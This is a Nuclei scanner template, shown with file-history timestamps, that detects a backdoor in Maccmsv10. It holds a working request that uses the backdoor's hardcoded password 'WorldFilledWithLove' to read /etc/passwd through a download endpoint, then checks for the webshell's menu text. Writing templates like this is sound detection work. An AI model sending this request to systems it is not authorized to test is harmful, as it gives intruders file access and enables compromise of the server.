nuclei-templates/vulnerabilities/other/maccmsv10-backdoor.yaml

34 lines
974 B
YAML
Raw Normal View History

2021-04-09 22:00:22 +00:00
id: maccmsv10-backdoor
2021-04-09 22:00:22 +00:00
info:
name: Maccmsv10 - Backdoor Detection
2021-04-09 22:00:22 +00:00
author: princechaddha
severity: critical
description: Maccmsv10 contains a backdoor which can be exploited by remote attackers. The backdoor is accessible via the '/index.php/bbs/index/download' endpoint and the special 'getpwd' parameter value of 'WorldFilledWithLove'.
reference:
- https://github.com/chaitin/xray/blob/master/pocs/maccmsv10-backdoor.yml
2021-04-09 22:00:22 +00:00
tags: maccmsv10,rce
requests:
- method: POST
path:
- "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1"
body: "getpwd=WorldFilledWithLove"
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "扫描后门"
- "反弹端口"
- "文件管理"
condition: and
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/05/30